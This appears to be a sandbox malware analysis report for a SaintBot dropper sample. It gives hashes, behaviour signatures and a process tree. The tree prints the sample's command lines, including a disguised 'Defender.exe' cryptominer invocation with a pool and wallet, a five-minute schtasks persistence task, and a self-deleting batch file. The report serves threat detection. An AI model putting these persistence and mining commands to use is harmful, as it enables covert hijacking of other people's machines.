Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    13s
  • max time network
    19s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    22/12/2024, 02:50

General

  • Target

    9361a5a13c26bdba1ce006356706339272465f4fa25c75a008f0041b9b647b90.exe

  • Size

    4.0MB

  • MD5

    539273d402029467299ebfd32f365b53

  • SHA1

    7b208fa71b1dbfa17378eabde614c0ed6c8e2fc3

  • SHA256

    9361a5a13c26bdba1ce006356706339272465f4fa25c75a008f0041b9b647b90

  • SHA512

    d539c2e40a7635a54999fc885b26bc7730da391a2f0991dddf8c63a75600298eaf068363f67bcfb3df0a10c37a5f8fbf077c4bdcd90af68dcc7e3d7e1c30443a

  • SSDEEP

    98304:qhxc++JLGaI8ojO9uHZRQ4Kg/rp0WwJYxLa4iv:03G6Ooi9u+gjy+x2jv

Malware Config

Signatures

  • SaintBot

    Saint Bot is a malware dropper being used to deliver secondary payloads such as information stealers.

  • SaintBot payload 1 IoCs
  • Saintbot family
  • Drops startup file 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 7 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Maps connected drives based on registry 3 TTPs 6 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 1 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9361a5a13c26bdba1ce006356706339272465f4fa25c75a008f0041b9b647b90.exe
    "C:\Users\Admin\AppData\Local\Temp\9361a5a13c26bdba1ce006356706339272465f4fa25c75a008f0041b9b647b90.exe"
    1⤵
    • Drops startup file
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3016
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Admin\run.vbs"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2972
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c 5666.bat
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2168
        • C:\Users\Admin\AppData\Local\Admin\Defender.exe
          Defender.exe
          4⤵
          • Executes dropped EXE
          PID:2712
        • C:\Users\Admin\AppData\Local\Admin\Defender.exe
          Defender.exe --algo ETHASH --pool eth.2miners.com:2020 --user 0xbFA6b56Ff31539269929C6913B7e68A45122847c.Worker
          4⤵
          • Executes dropped EXE
          PID:980
    • C:\Users\Admin\AppData\Local\Admin\watchdog.exe
      "C:\Users\Admin\AppData\Local\Admin\watchdog.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Loads dropped DLL
      • Maps connected drives based on registry
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3000
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google Chrome.exe
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google Chrome.exe"
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • Loads dropped DLL
        • Maps connected drives based on registry
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2904
        • C:\Windows\SysWOW64\dfrgui.exe
          "C:\Windows\system32\dfrgui.exe"
          4⤵
          • Loads dropped DLL
          • Adds Run key to start application
          • Maps connected drives based on registry
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious use of WriteProcessMemory
          PID:1940
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 5 /tn "Update" /tr "%SYSTEMDRIVE%\Users\%USERNAME%\AppData\Local\zz%USERNAME%\%USERNAME%.vbs" /F
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2088
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c C:\Users\Admin\AppData\Roaming\del.bat
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2764
        • C:\Windows\SysWOW64\PING.EXE
          ping localhost -n 3
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:1788
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c del "C:\Users\Admin\AppData\Roaming\del.bat"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2184

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Admin\5666.bat

    Filesize

    490B

    MD5

    3d959857b0136a49f004516acc96a627

    SHA1

    60f7ec89669792026aeec876f664d62d19bdc269

    SHA256

    e3cf05b34d24ca28a56a04281d310b4212adc2a19aae43f668bff34debd60f04

    SHA512

    e3d11abd4bfe1f0fa635241c120d2c09966926673792e440a1721a3a88e08e48cfb4079c0f6037f1f275edf4d0dbd8d37266e0047674d882207b06e1dbaa805a

  • C:\Users\Admin\AppData\Local\Admin\run.vbs

    Filesize

    116B

    MD5

    1b068a0de7c2182577b08ccf6973d35d

    SHA1

    fcae2d3432c11c9139e1a5ac513667f1f00931ca

    SHA256

    3ab89fde92e31ee6818660f9c29acc2cf0d03799bb5c4f0641929bbd8eade2b4

    SHA512

    728b6b024e1f5b9df94de37d83b9423447888783e0bcd7528047ee1d922784deb30df9a232f87f0e95e4d47499544c7bd2368a2f35b144bfd385a203464d71f3

  • C:\Users\Admin\AppData\Local\Admin\watchdog.exe

    Filesize

    29KB

    MD5

    512292a064c1899e46b19b2f0c3ada9a

    SHA1

    fabb10754aceead1c7c0688b10484971ac020149

    SHA256

    c773acbb7e825f660f9e7c4c6c71b20e678b556e63e702a3f3286bd59c3f1b61

    SHA512

    16788ca1c710726ad98317b9e9c7da82bbbfe4d511a611f558418784d39fd789925691ea3caca79cb5ea38c81f2d1b3dd2003eb246063fa5cb5ac81e834f0f35

  • C:\Users\Admin\AppData\Local\zzAdmin\slideshow.mp4

    Filesize

    1.2MB

    MD5

    d124f55b9393c976963407dff51ffa79

    SHA1

    2c7bbedd79791bfb866898c85b504186db610b5d

    SHA256

    ea1e16247c848c8c171c4cd1fa17bc5a018a1fcb0c0dac25009066b6667b8eef

    SHA512

    278fe3a4b1fbbe700e4f4483b610133e975e36e101455661d5197bd892a68839b9d555499040d200c92aefa9e3819380e395c0cd85d5fc845c6364d128a8cf06

  • C:\Users\Admin\AppData\Roaming\del.bat

    Filesize

    114B

    MD5

    ccf1f01af7806334814c7d2481b60e59

    SHA1

    126b1d3d067653d3936f82b15b060bce172c0258

    SHA256

    432e3e54e9c6f791ae439eb3af32bc350ffbae4ea42724a1875c13e49058e940

    SHA512

    d333c52d23ba1473117f5e83c13fc880055989df4fc3a9cb69b13d3e297160f048e9a9256289840d9039587dd08030798027204f66886e6ae83136512fff81b0

  • \Users\Admin\AppData\Local\Admin\Defender.exe

    Filesize

    3.7MB

    MD5

    3c9dcc91e05dc05a01fff739e40474d7

    SHA1

    4958788d0d3f4bdd7410669da6b8d66c642b0551

    SHA256

    6dd7b3d944595429136366b908fd18d3cac315c6f1453dd4cb5bcafa9e9a95a6

    SHA512

    f6fbe0bf4c71e6bda658d42b0bae94b51da6bf44ec813c070b7a74c7243f277ca0749b37dcd48a71e42295f7ade9f2384e6a69711cbb2dcbd732c0a4c7934d0f

  • memory/980-56-0x000000013F530000-0x0000000141350000-memory.dmp

    Filesize

    30.1MB

  • memory/1940-55-0x0000000000080000-0x000000000008B000-memory.dmp

    Filesize

    44KB

  • memory/2168-49-0x0000000002040000-0x0000000003E60000-memory.dmp

    Filesize

    30.1MB

  • memory/2168-57-0x0000000002040000-0x0000000003E60000-memory.dmp

    Filesize

    30.1MB

  • memory/2712-50-0x000000013FCC0000-0x0000000141AE0000-memory.dmp

    Filesize

    30.1MB